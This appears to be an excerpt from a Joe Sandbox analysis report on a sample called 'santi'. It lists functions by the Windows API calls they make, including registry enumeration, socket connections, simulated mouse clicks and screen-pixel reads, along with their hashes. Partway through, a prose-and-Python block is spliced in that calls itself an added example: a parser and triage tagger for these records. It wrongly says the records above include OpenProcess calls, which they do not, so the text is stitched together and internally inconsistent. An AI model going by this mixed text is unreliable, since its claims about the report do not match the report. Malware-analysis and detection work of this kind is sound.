                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Variant$Clear$ChangeInitType
                                                                • String ID:
                                                                • API String ID: 4136290138-0
                                                                • Opcode ID: 174ae022a9b85159e7c8ddb5c5d334cd7bcce40c090707230905f58f4e2edc4d
                                                                • Instruction ID: b7a71f6b49acf849014ec45b51d0c692297c4e535252516a5d51e9e11547f89e
                                                                • Opcode Fuzzy Hash: 174ae022a9b85159e7c8ddb5c5d334cd7bcce40c090707230905f58f4e2edc4d
                                                                • Instruction Fuzzy Hash: 155157B5A00219EFDB15CF58D880AAAB7B8FF9C314B158559ED59DB300E730EA51CFA0
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003406EE
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 0034077D
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0034079B
                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 003407E1
                                                                • FreeLibrary.KERNEL32(00000000,00000004), ref: 003407FB
                                                                  • Part of subcall function 002FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0032A574,?,?,00000000,00000008), ref: 002FE675
                                                                  • Part of subcall function 002FE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0032A574,?,?,00000000,00000008), ref: 002FE699
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 327935632-0
                                                                • Opcode ID: 3bbecfc55775d619aca3b588f86d672f28ec3a49921d4b2ef69b280eba12f1e4
                                                                • Instruction ID: b552e97e193946d3885afb865f1ee45c3261bdf41f194c6e937c642dd5fecf11
                                                                • Opcode Fuzzy Hash: 3bbecfc55775d619aca3b588f86d672f28ec3a49921d4b2ef69b280eba12f1e4
                                                                • Instruction Fuzzy Hash: B2516875A40209DFCB05EFA8C5809ADB7F9BF48310B558059EA16AB352DB70FD42CF81
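The two records above (OpenProcess / GetProcessMemoryInfo, and LoadLibraryW / GetProcAddress / FreeLibrary) are the kind of function listing an analyst wants to pull out of a report like this in bulk rather than read one by one. The following Python is an added example, not part of the Joe Sandbox report and not the sandbox's signature logic: it parses the "APIs ... Instruction Fuzzy Hash" records exactly as they appear in this listing, separates direct calls from the "Part of subcall function" entries, tags each function with a small set of triage rules, and decodes the OpenProcess desired-access mask (00000410 is PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, which matches the GetProcessMemoryInfo call that follows it). The sample input is two records copied from this page; the RULES table and the access-bit names are this example's own assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample: two function records copied from this report's listing.
SAMPLE = """\
APIs
• Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
• LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 003406EE
• GetProcAddress.KERNEL32(00000000,?), ref: 0034077D
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0034079B
• FreeLibrary.KERNEL32(00000000,00000004), ref: 003407FB
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
• Instruction Fuzzy Hash: B2516875A40209DFCB05EFA8C5809ADB7F9BF48310B558059EA16AB352DB70FD42CF81
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003419F3
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00341A26
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00341B49
• CloseHandle.KERNEL32(?), ref: 00341BBF
Memory Dump Source
• Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• Instruction Fuzzy Hash: 6481A170610204EBDF119F64C896BADBBE5EF08720F158469FA05AF3C2D7B5E9518F90
"""

# One API line: optional "Part of subcall function XXXXXXXX:" prefix, then
# Name.MODULE, optional (args), then "ref: ADDR". Lines such as
# "__swprintf.LIBCMT ref: 002E93AB" have neither parentheses nor a comma.
API_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s+)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]{8})$"
)

@dataclass
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]
    ref: str
    subcall: Optional[str]  # callee address when listed under "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    fuzzy_hash: str = ""

    def direct_calls(self) -> List[ApiCall]:
        return [c for c in self.calls if c.subcall is None]

def parse_records(text: str) -> List[FunctionRecord]:
    """Split the listing into records: one per function, in report order."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        # A record starts at "APIs"; a function with no API calls starts directly at
        # "Memory Dump Source" (as the report does for such functions).
        if line == "APIs" or (line == "Memory Dump Source" and (cur is None or cur.fuzzy_hash)):
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = tuple(a for a in (m.group("args") or "").split(",") if a)
            cur.calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
    return records

# Illustrative triage rules (this example's assumption, not Joe Sandbox's signatures):
# a tag fires when every listed API is among the function's direct calls.
RULES = {
    "dynamic-api-resolution": {"LoadLibraryW", "GetProcAddress"},
    "process-inspection": {"OpenProcess", "GetProcessMemoryInfo"},
    "process-creation": {"CreateProcessW"},
}

def tag_record(rec: FunctionRecord) -> List[str]:
    names = {c.name for c in rec.direct_calls()}
    return sorted(tag for tag, needed in RULES.items() if needed <= names)

# Win32 PROCESS_* access bits (assumed here from the SDK headers).
PROCESS_ACCESS_BITS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

def decode_access(mask: int) -> List[str]:
    return [name for bit, name in sorted(PROCESS_ACCESS_BITS.items()) if mask & bit]

def open_process_access(rec: FunctionRecord) -> List[str]:
    """Decode the dwDesiredAccess argument of the first OpenProcess call, if any."""
    for c in rec.direct_calls():
        if c.name == "OpenProcess" and c.args and c.args[0] != "?":
            return decode_access(int(c.args[0], 16))
    return []

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(rec.fuzzy_hash[:16], tag_record(rec), open_process_access(rec))
```

The parser only splits and labels; the judgement stays in RULES, which you would extend with the other API combinations this report surfaces (for example PostMessageW with the 00000201/00000202 button messages, or RegConnectRegistryW with RegEnumKeyExW) before running it over the whole "Executed Functions" listing.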
                                                                APIs
                                                                  • Part of subcall function 00343C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00342BB5,?,?), ref: 00343C1D
                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00342EEF
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00342F2E
                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00342F75
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00342FA1
                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00342FAE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                • String ID:
                                                                • API String ID: 3740051246-0
                                                                • Opcode ID: 2a224c4b1a5df6cc7298959870ecb4a710e4c53bf3387dbcf41f7260039d1175
                                                                • Instruction ID: 8a995cd01fad22617f102fde9158decd37c430e1ede5130a96c15a7af1ad6b33
                                                                • Opcode Fuzzy Hash: 2a224c4b1a5df6cc7298959870ecb4a710e4c53bf3387dbcf41f7260039d1175
                                                                • Instruction Fuzzy Hash: 0F515771218244AFD705EF65C891EABB7F8FF88304F80881DF5959B2A1DB70E919CB52
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 071bc075b2fbc5f6e2aef933ebe78eb179d56b3c2af5d5d5882e80bb392bc31c
                                                                • Instruction ID: 74f7a07c7da470e388f9957316649e93c1877a44169d8f3bbfa511c2bfc22d70
                                                                • Opcode Fuzzy Hash: 071bc075b2fbc5f6e2aef933ebe78eb179d56b3c2af5d5d5882e80bb392bc31c
                                                                • Instruction Fuzzy Hash: 7741E639E12104ABC752DF68CC44FA9BBA8EB0A350F155125F819AB2E1C770BD41DA50
                                                                APIs
                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003312B4
                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 003312DD
                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0033131C
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00331341
                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00331349
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                • String ID:
                                                                • API String ID: 1389676194-0
                                                                • Opcode ID: 437e7b59745e2dd73bbae81d20fb1781de0ef44265fecb4a8a1352668d8c5499
                                                                • Instruction ID: 8854df2671d90a37918ee6e65c916bd624cb466aaca4457ede5598295f1af46f
                                                                • Opcode Fuzzy Hash: 437e7b59745e2dd73bbae81d20fb1781de0ef44265fecb4a8a1352668d8c5499
                                                                • Instruction Fuzzy Hash: 8E410B35A10145DFCB01EF65C9919AEBBF9FF08314B148099E90AAB3A2DB31ED51DF50
                                                                APIs
                                                                • GetWindowRect.USER32(?,?), ref: 0031B369
                                                                • PostMessageW.USER32(?,00000201,00000001), ref: 0031B413
                                                                • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0031B41B
                                                                • PostMessageW.USER32(?,00000202,00000000), ref: 0031B429
                                                                • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0031B431
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessagePostSleep$RectWindow
                                                                • String ID:
                                                                • API String ID: 3382505437-0
                                                                • Opcode ID: 491c8a0eeda3663741102c8d69a73624ef9ca4e052c7b09e5b112a5701c7ced2
                                                                • Instruction ID: ee6c31f1050ca62269cb5e64cff311e24c2c67a444940ea8ad8949d343d94961
                                                                • Opcode Fuzzy Hash: 491c8a0eeda3663741102c8d69a73624ef9ca4e052c7b09e5b112a5701c7ced2
                                                                • Instruction Fuzzy Hash: 9331D171900219EBDF09CF68DD4DADEBBB9EB08315F118629F821AB1D1C7B09D64CB91
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0031DBD7
                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0031DBF4
                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0031DC2C
                                                                • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0031DC52
                                                                • _wcsstr.LIBCMT ref: 0031DC5C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                • String ID:
                                                                • API String ID: 3902887630-0
                                                                • Opcode ID: 5aa4040cc3553f4847edfb85d18111638c050e30eb6674899154b6e745868b18
                                                                • Instruction ID: 75a33bf6e1e0c3d0b6e64294833666b20dd6d37b0c57400136acf6457faf03da
                                                                • Opcode Fuzzy Hash: 5aa4040cc3553f4847edfb85d18111638c050e30eb6674899154b6e745868b18
                                                                • Instruction Fuzzy Hash: 43212C71604104BBE71B5F35DD49EBB7BACDF4A750F118039F909CA191EAA1DC41D6A0
                                                                APIs
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0031BC90
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0031BCC2
                                                                • __itow.LIBCMT ref: 0031BCDA
                                                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0031BD00
                                                                • __itow.LIBCMT ref: 0031BD11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$__itow
                                                                • String ID:
                                                                • API String ID: 3379773720-0
                                                                • Opcode ID: 089590038c1dab851d7db4ec090811c3fef018bb8ed016c3d551b2789f85dd7b
                                                                • Instruction ID: 172fb95cecf7c88e79be1692e4a3ae97970557ec3be4ef5353f8a296e746f3cf
                                                                • Opcode Fuzzy Hash: 089590038c1dab851d7db4ec090811c3fef018bb8ed016c3d551b2789f85dd7b
                                                                • Instruction Fuzzy Hash: 4C210831B402187BDB1AAE659C8AFDFBA6CAF5E350F400024FA05EF181DB70898587E1
                                                                APIs
                                                                  • Part of subcall function 002E50E6: _wcsncpy.LIBCMT ref: 002E50FA
                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,003260C3), ref: 00326369
                                                                • GetLastError.KERNEL32(?,?,?,003260C3), ref: 00326374
                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003260C3), ref: 00326388
                                                                • _wcsrchr.LIBCMT ref: 003263AA
                                                                  • Part of subcall function 00326318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,003260C3), ref: 003263E0
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                • String ID:
                                                                • API String ID: 3633006590-0
                                                                • Opcode ID: 4a3d9b555183f8de5f468780c763daa94df0526dc264cb3f6d2dd971d7d365c2
                                                                • Instruction ID: da734d926e88be1a627a6515a1600a2bfb8dfc5b5f48f4b615e0795be9e44269
                                                                • Opcode Fuzzy Hash: 4a3d9b555183f8de5f468780c763daa94df0526dc264cb3f6d2dd971d7d365c2
                                                                • Instruction Fuzzy Hash: 05210835A152254ADB27EB74BC53FEA33ACAF053A0F104465F205C71E0EBA0D9808A64
                                                                APIs
                                                                  • Part of subcall function 0033A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0033A84E
                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00338BD3
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338BE2
                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00338BFE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastconnectinet_addrsocket
                                                                • String ID:
                                                                • API String ID: 3701255441-0
                                                                • Opcode ID: c10905bcbab237bac92b1037391b041a324ccf671fb71eb6c02b91cbfe691417
                                                                • Instruction ID: 2afe0b1209dc05967c3774deb4484196843fe79b704a329f6f7da36f77fa3562
                                                                • Opcode Fuzzy Hash: c10905bcbab237bac92b1037391b041a324ccf671fb71eb6c02b91cbfe691417
                                                                • Instruction Fuzzy Hash: FA2190317002149FCB12AF68DD85B7EB7ADAF48750F058459FA56AB2D2CBB4AC018B61
                                                                APIs
                                                                • IsWindow.USER32(00000000), ref: 00338441
                                                                • GetForegroundWindow.USER32 ref: 00338458
                                                                • GetDC.USER32(00000000), ref: 00338494
                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 003384A0
                                                                • ReleaseDC.USER32(00000000,00000003), ref: 003384DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ForegroundPixelRelease
                                                                • String ID:
                                                                • API String ID: 4156661090-0
                                                                • Opcode ID: d9d9241c56020d998febb5ed36fcb1f73db11d8c20b453ce01edd7f071f282c2
                                                                • Instruction ID: 66cafbb7e520b546545169d6bdb994f7705c1f78dcf32582dc299f5a2d9c04e5
                                                                • Opcode Fuzzy Hash: d9d9241c56020d998febb5ed36fcb1f73db11d8c20b453ce01edd7f071f282c2
                                                                • Instruction Fuzzy Hash: 04219F35A00204AFD701DFA5DC85AAEBBE9EF49301F04C479E94A9B651CB70AC00CB60
                                                                APIs
                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 002FAFE3
                                                                • SelectObject.GDI32(?,00000000), ref: 002FAFF2
                                                                • BeginPath.GDI32(?), ref: 002FB009
                                                                • SelectObject.GDI32(?,00000000), ref: 002FB033
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ObjectSelect$BeginCreatePath
                                                                • String ID:
                                                                • API String ID: 3225163088-0
                                                                • Opcode ID: 3c6cd76e17f9af2a5a12898b27e68e67077308c9a8cf5569aceca09878bbaa7c
                                                                • Instruction ID: 1f13c5344d89fb7037128a2b8789660646c1a3b744807da7b34477acbf99fc6c
                                                                • Opcode Fuzzy Hash: 3c6cd76e17f9af2a5a12898b27e68e67077308c9a8cf5569aceca09878bbaa7c
                                                                • Instruction Fuzzy Hash: 4121A1B4910209EFDB239F55EC44BAABB6CB712395F18432AF925D61F0C7B04965CF90
                                                                APIs
                                                                • __calloc_crt.LIBCMT ref: 003021A9
                                                                • CreateThread.KERNEL32(?,?,003022DF,00000000,?,?), ref: 003021ED
                                                                • GetLastError.KERNEL32 ref: 003021F7
                                                                • _free.LIBCMT ref: 00302200
                                                                • __dosmaperr.LIBCMT ref: 0030220B
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                • String ID:
                                                                • API String ID: 2664167353-0
                                                                • Opcode ID: 6d2b5f029f5cccd9a22ea9a652d7609de60ed3eed02b88b5fd18c95e45b3f8ab
                                                                • Instruction ID: b8e792f83e6e79e25c443db571f0b861fb937b868c523556d6f9dbf51609d242
                                                                • Opcode Fuzzy Hash: 6d2b5f029f5cccd9a22ea9a652d7609de60ed3eed02b88b5fd18c95e45b3f8ab
                                                                • Instruction Fuzzy Hash: 90112633606346AFEB17AFA9DC56DAB3B9CEF04770B110429F918CA1C1EB71D81187A0
                                                                APIs
                                                                • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0031ABD7
                                                                • GetLastError.KERNEL32(?,0031A69F,?,?,?), ref: 0031ABE1
                                                                • GetProcessHeap.KERNEL32(00000008,?,?,0031A69F,?,?,?), ref: 0031ABF0
                                                                • HeapAlloc.KERNEL32(00000000,?,0031A69F,?,?,?), ref: 0031ABF7
                                                                • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0031AC0E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
